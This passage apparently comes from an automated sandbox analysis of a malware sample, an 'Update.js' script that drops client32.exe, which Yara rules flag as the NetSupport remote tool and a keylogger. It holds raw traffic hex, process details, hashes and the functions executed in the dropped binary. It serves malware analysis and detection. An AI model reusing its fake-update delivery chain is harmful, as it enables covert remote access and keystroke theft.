2024-11-27 15:29:45 UTC	8000	IN	Data Raw: 07 8d 52 d3 8a ab 5a a2 36 15 b2 96 32 8d 17 2d 39 32 4f ed d8 c9 53 f6 6a d7 0e 67 be d0 53 e2 df 28 d0 af 3e dd fd 91 9f 32 ea 7e f7 a4 61 e9 15 47 37 9a 6f 5f f1 78 cb fd aa 51 ea a9 f4 ee b5 b1 83 f6 77 fa 96 4e be 17 fc e1 9e 72 85 d9 a6 2a 26 f5 72 6b d1 c3 93 29 c2 a9 9e 6e 40 b3 d3 4d b6 40 a1 25 62 71 46 f0 82 c4 30 f7 a6 79 13 d3 fc ff 50 4d 69 4c 7a 79 ea 8f 58 32 54 54 52 59 e6 07 3c b3 9b b8 95 3a ca 14 75 8a 5a 48 c9 1b f6 9c b3 67 f9 25 cd 1d a9 cf 9d af 3f f1 ce b0 e8 c0 ad 64 e4 4c 65 a0 8a c9 92 48 14 43 7c 24 ae 2f 4e e3 a4 6c f5 08 3e 3f 66 9c a5 25 87 c1 8b b1 e0 13 aa 60 01 9f 3e 84 8e e9 a8 92 48 80 22 87 cb c0 1d 19 fa 88 ce e8 9c 1e c5 16 1f 83 db 08 ac 04 78 b6 45 0f 33 83 1b 25 c1 6b 29 d2 28 49 85 72 75 b1 80 65 08 7d d6 31 a0 Data Ascii: RZ62-92OSjgS(>2~aG7o_xQwNr*&rk)n@M@%bqF0yPMiLzyX2TTRY<:uZHg%?dLeHC\|$/Nl>?f%`>H"xE3%k)(Irue}1
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: 2c f5 3c 39 4e 69 4f 4d 18 4f 4d de 29 58 af b7 af c9 ac 3e e9 e3 07 f0 78 f3 f8 71 e0 bf bd 0b 7c 86 06 ab 76 e0 b6 63 8f 54 6a a6 cf 66 50 78 47 b0 9b 10 d8 b5 67 e3 ba ee d3 af c3 71 9a 1e 13 72 25 a6 a2 c4 7f d7 a7 e0 17 a9 44 9b 0d 01 bd dd 24 cb 87 69 db 02 6c 06 6c c1 6e 23 45 d3 48 27 c6 df 8d 20 03 4c 55 9d 76 58 db 3e 23 b6 b2 be e8 e4 f8 fa f9 34 fc 03 93 e1 b7 e8 cd 2f 6b 57 f1 6b f0 6f 12 28 97 71 bb 6a 46 af 4b 75 8e ae d9 41 ee 21 eb 34 2d f0 29 b0 f3 d9 51 f4 ba 7c d8 f8 99 55 7a bd ad 56 1e 8c 55 a1 a8 c8 3f 2f 7f 96 8f bf f7 5b 55 e6 6f f8 76 01 b5 ce 80 55 5a c9 d7 be b6 59 92 a7 26 07 28 d4 e0 f6 68 cf 16 e2 c5 16 0e 35 38 66 eb 5d 98 7f e9 d7 c0 9f 73 7b 3c 18 b8 f7 04 04 53 9d 06 52 70 8c 6b c5 58 76 3f 14 ce 35 ca 14 2c f6 0e 73 6f Data Ascii: ,<9NiOMOM)X>xq\|vcTjfPxGgqr%D$illn#EH' LUvX>#4/kWko(qjFKuA!4-)Q\|UzVU?/[UovUZY&(h58f]s{<SRpkXv?5,so
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: 81 61 5d 73 e4 2a 80 a3 5f 5d cb 0a 73 9c 4a e8 75 f6 c7 c3 26 cc 1e f0 d2 fc c7 6b b0 e3 94 43 15 50 2b 22 0d ee 1e 2b 87 96 b3 2f b2 82 89 85 2b 15 65 11 fc ac 82 44 8d a9 43 98 14 2a c7 cf 4a fc 5c 86 9f 8b f1 73 05 80 62 03 dd 3e 6b 18 81 d1 16 b9 03 40 c3 58 0c 06 80 17 8a 3f 7d b8 61 6b e7 05 af 93 3e 5a d4 a3 7b 7d f4 77 3d 74 fa e8 97 5b e3 f5 d1 ca 1e 3a 7d f4 dd ad 31 7d d4 da e3 3f d1 47 cb c2 b9 8f ff 3b 7d 79 47 52 f7 f4 25 ea e9 9b da 89 3e 9a a4 a3 6f 94 8e be 47 93 fe 03 fa 7e 03 21 93 c2 4f 3f 25 08 42 17 2a 63 ff 3a cb 2f b0 44 79 3d 99 11 6a 4c 8a 6e 7b ae 40 a2 45 2a 46 e9 4a 20 6d 1e fa 49 62 74 4f f3 51 01 fd 09 ee 44 4d 4c 44 66 67 d6 78 2f 65 fe a0 33 b7 80 ed 06 f8 06 05 f4 71 6e 0f b1 eb 87 7d 26 cd da ac 5f bf 82 2d 19 3a fa c0 Data Ascii: a]s_]sJu&kCP+"+/+eDCJ\sb>k@X?}ak>Z{}w=t[:}1}?G;}yGR%>oG~!O?%Bc:/Dy=jLn{@EFJ mIbtOQDMLDfgx/e3qn}&_-:
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: b4 ea 17 1a 09 16 46 82 b2 05 d2 95 45 06 12 82 d6 2a 55 80 dd cd 06 28 41 84 37 b0 4c e8 76 c4 d8 09 6b 6d ee 43 14 f8 cb b6 24 e6 58 d8 b5 d1 82 32 77 34 c6 5c 83 27 71 dc 51 55 3b 09 ce 1c de 49 00 c3 2e 74 15 c4 d3 77 f9 8c 12 50 17 69 24 6d f2 8e 1a 68 58 c4 5a b1 d8 c4 c6 7e 07 8c 83 e0 ef c7 ad d3 52 e3 c3 43 6d 5e 3a f8 e5 48 44 ad 25 95 d5 92 8a b5 8c b4 74 a9 65 0e d6 82 23 59 75 fc 28 ea bb 3e 23 54 e8 56 14 e8 7a 97 97 d5 d8 2a 6f d9 8e 9d 6c ad d8 69 c4 ee f3 42 f7 b9 f9 19 62 f4 fd 29 4e 40 fa ae 1c b1 c0 97 ee a1 b9 2f 01 52 e8 9b d0 fb fe ab cb c7 0b fe cb c9 2e e8 af 48 3c 7c 38 47 74 03 fc c0 97 a2 24 9b 05 65 91 19 49 5e d1 39 18 9d b5 a2 06 d6 83 10 90 2c 32 5d 33 a7 02 9f 1b 18 31 14 ac 96 f0 61 1b 0a fa e1 51 b0 61 f9 3d 8c 54 37 90 Data Ascii: FEU(A7LvkmC$X2w4\'qQU;I.twPi$mhXZ~RCm^:HD%te#Yu(>#TVzoliBb)N@/R.H<\|8Gt$eI^9,2]31aQa=T7
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: b9 f4 0c bd fe f6 48 84 24 c9 19 70 ce 5e c6 c4 87 59 2e 63 5f 6c 25 aa e2 60 12 e0 b9 03 b6 0e 53 eb 8c e8 e2 4b d9 e2 4b 71 f1 3d 20 1a 84 7d 5d db 03 2d b1 a8 2d c1 b8 06 c5 31 f2 bb d3 cf 1e 3b f5 bf ea 67 bf c8 ef 46 9f 19 23 02 75 6a ff 4c 32 95 2f e2 fa a3 85 e9 8f 22 e8 8f 39 a0 74 35 10 01 32 fc 2d 6a 0f 9a 3b 37 a8 1b fd 6b 0f fd 5f f5 af da e9 dd d0 bb e4 4e 83 d0 9d be 78 39 84 75 42 7d 51 d8 de ad be 38 93 4b 6f ae 17 a8 f7 0f 80 ad 2e 76 2c e8 c5 9f 3f bc f7 2a 03 df 83 cd 4f 81 5b 21 05 74 e0 59 a6 81 ed 71 ec 1d 5a 53 7c ae 69 26 14 2c 2f b5 08 fe 19 c1 8b b6 f9 d3 bc a4 cc e6 f8 78 7e 02 b9 18 6c b3 cd 1b 16 db 5a d8 f2 d4 ad c5 f5 23 21 c8 ba 19 d8 2a ba b9 c8 dc 03 db 0b c7 de 92 18 ce d0 b1 40 1f b9 d8 06 58 12 c8 4d 8c 8f e3 ab c4 fe Data Ascii: H$p^Y.c_l%`SKKq= }]--1;gF#ujL2/"9t52-j;7k_Nx9uB}Q8Ko.v,?O[!tYqZS\|i&,/x~lZ#!@XM
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: 56 58 b2 20 45 c0 6f f4 93 6b 60 68 53 78 df 05 ae cf 46 2e 0c 5c 0d 66 84 2a e8 ed 02 f8 27 16 14 28 ca 86 ef f9 d3 0a 30 b2 a2 f7 d4 63 6c 7b 46 76 40 25 a4 0a 2a 56 94 bb a1 5e 36 a7 fe 74 39 86 6c 80 82 4a 08 98 57 74 f1 91 f3 2a 08 c9 70 00 2e 38 58 61 a3 01 e8 dc 22 dd 36 8f 0f c2 04 36 08 15 e9 0c b7 fa 6e 3e b0 b6 4b 6a bf 02 fa 63 dc 35 10 57 18 bb 0c 78 dd 2d b5 60 f2 65 d8 84 b4 2c 9c 06 d0 0f 90 29 aa 45 95 aa cd df ab 2f e0 ab 9c c2 bb 23 34 e5 3c 02 41 ae 2f e2 a2 d7 1e 03 ee 4b e3 9d 19 b0 64 e1 0c b4 56 6c 61 3c 10 0e 55 30 20 f0 d6 e3 1d 4e 22 6a fd 4a 08 aa 10 7d a3 14 65 19 67 ad 15 bc 79 2b f9 40 40 db 5d 05 05 7c 80 b1 5a 37 2b 79 5e eb 2b fa bb 45 10 87 77 d9 f7 38 b9 d8 56 d4 ed b8 e8 9f 41 fa 40 98 1c 2f bd db 0e e1 49 01 21 4f 11 Data Ascii: VX Eok`hSxF.\f'(0cl{Fv@%V^6t9lJWt*p.8Xa"66n>Kjc5Wx-`e,)E/#4<A/KdVla<U0 N"jJ}egy+@@]\|Z7+y^+Ew8VA@/I!O
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: e8 24 d6 3f fd e8 e0 4f 98 1e 7a 86 ad 26 fc bd d4 3a 4e 39 29 4d 51 16 1a 1e 3e 3b cc 13 4e 1c b8 8d cb 30 79 62 02 fb 46 6b 5f 43 ae 59 b7 91 53 9e 2a 15 47 6b db 0d b5 55 b2 da d6 6e e4 e2 d2 53 20 d2 45 af e3 13 71 ec d7 92 0e b8 1c e8 b7 07 3b cc 7e 2b fb c1 d8 cf df a3 da 2e a0 70 99 9a 30 11 34 c8 b2 c4 6a f8 23 81 64 13 d7 01 43 d2 f1 7f 43 7b cc ba e9 7b d5 e6 fd 34 5a 61 35 54 38 88 37 0f 1c 29 7d 36 34 96 89 74 1d 1c af 3b ed 6c 77 e1 a8 f3 0f 78 ab 91 25 a6 37 92 48 ec ea 1c ad 3d d9 11 71 9c b6 2e 83 0b 68 ca d4 1e 2f 06 3f ed a1 8c 4d a8 ed 30 7a e4 71 9b 19 38 fd 60 03 6f 67 75 35 56 7b 85 b4 28 5a ed 7a a8 76 0d 53 e8 d7 42 26 41 78 b5 b5 4b 5f 83 d5 02 12 5c f4 05 c4 60 5b b7 bd 5a ed a9 27 a2 18 56 00 86 62 c0 b0 9d 97 25 c9 50 c6 cd 30 Data Ascii: $?Oz&:N9)MQ>;N0ybFk_CYS*GkUnS Eq;~+.p04j#dCC{{4Za5T87)}64t;lwx%7H=q.h/?M0zq8`ogu5V{(ZzvSB&AxK_\`[Z'Vb%P0

Target ID:	0
Start time:	10:29:28
Start date:	27/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Imagebase:	0x7ff78c280000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:29:51
Start date:	27/11/2024
Path:	C:\ProgramData\o2xqxqs\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\o2xqxqs\client32.exe"
Imagebase:	0x6b0000
File size:	103'824 bytes
MD5 hash:	C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3109458678.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.2045118939.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 27%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:29:53
Start date:	27/11/2024
Path:	C:\ProgramData\o2xqxqs\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\o2xqxqs\client32.exe"
Imagebase:	0x6b0000
File size:	103'824 bytes
MD5 hash:	C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3110380129.0000000003082000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3112198355.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2366516566.0000000005976000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3108971524.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.2064378537.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2366162151.0000000005946000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3111648585.0000000005995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3112664746.000000006C680000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.3110380129.000000000306F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2366408440.0000000005946000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

_fgets.LIBCMT ref: 110628E2
_strpbrk.LIBCMT ref: 11062949
_fgets.LIBCMT ref: 11062A4C
_strpbrk.LIBCMT ref: 11062AC3
__wcstoui64.LIBCMT ref: 11062ADC
_fgets.LIBCMT ref: 11062B55
_strpbrk.LIBCMT ref: 11062B7B

Strings

%c%04d%s, xrefs: 11062CA4
_include, xrefs: 11062CE9
cd_install, xrefs: 1106313B
_License, xrefs: 11062E76, 11062F34, 11062F4E, 110630D6, 11063140, 1106315B, 11063177, 11063271, 11063490, 11063578
expiry, xrefs: 11063250
licensee, xrefs: 11063573
%s.%04d.%s, xrefs: 11062DC9
?starT, xrefs: 11063291, 1106329D
enforce, xrefs: 11062C56
inactive, xrefs: 110630D1
start, xrefs: 11063259, 11063270
_version, xrefs: 11062F49
Client, xrefs: 11062D82, 11062DC4
shrink_wrap, xrefs: 11063156
/- , xrefs: 1106331E, 11063351, 11063384
Expired, xrefs: 1106348B
ACM, xrefs: 110631B7
_checksum, xrefs: 11062F2F
defaults, xrefs: 11062C36
?expirY, xrefs: 11063288
product, xrefs: 11063172

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: 3dbcc6c2b957be7c9169ef0f10d56e2d8bafb7c75dace27978ce2253007c16d5
Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
Opcode Fuzzy Hash: 3dbcc6c2b957be7c9169ef0f10d56e2d8bafb7c75dace27978ce2253007c16d5
Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11144173
LoadLibraryA.KERNEL32(?), ref: 111441BC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
GetModuleHandleA.KERNEL32(?), ref: 111441EA
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

MiniDumpWriteDump, xrefs: 111442A3
SymGetOptions, xrefs: 1114426C
SymGetLineNext, xrefs: 1114421F
SymGetLinePrev, xrefs: 1114422A
SymGetSymFromAddr, xrefs: 1114428D
dbghelp.dll, xrefs: 11144198
IMAGEHLP.DLL, xrefs: 111441DE, 111441E3, 111441E9
SymFunctionTableAccess, xrefs: 11144298
SymInitialize, xrefs: 11144261
SymGetLineFromAddr, xrefs: 111441F8
StackWalk, xrefs: 11144243
SymLoadModule, xrefs: 11144256
SymMatchFileName, xrefs: 11144235
SymSetOptions, xrefs: 11144277
SymCleanup, xrefs: 1114424B
SymGetModuleInfo, xrefs: 11144282
SymGetLineFromName, xrefs: 11144217
DBGHELP.DLL, xrefs: 111441CF, 111441D4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175
registryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
_memset.LIBCMT ref: 11145CFD

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

_strncpy.LIBCMT ref: 11145DCA

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

RegCloseKey.KERNEL32(00000000), ref: 11145E66

Strings

CurrentMajorVersionNumber, xrefs: 11145DF8
CurrentMinorVersionNumber, xrefs: 11145E30
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11145CCB
CSDVersion, xrefs: 11145D1A
Service Pack, xrefs: 11145EAD
CurrentVersion, xrefs: 11145D44

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91

Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4

_memset.LIBCMT ref: 11146055
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
FreeLibrary.KERNEL32(00000000), ref: 111460BF
GetSystemDefaultLangID.KERNEL32 ref: 111460CA

Strings

kernel32.dll, xrefs: 11146080
GetUserDefaultUILanguage, xrefs: 111460A1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
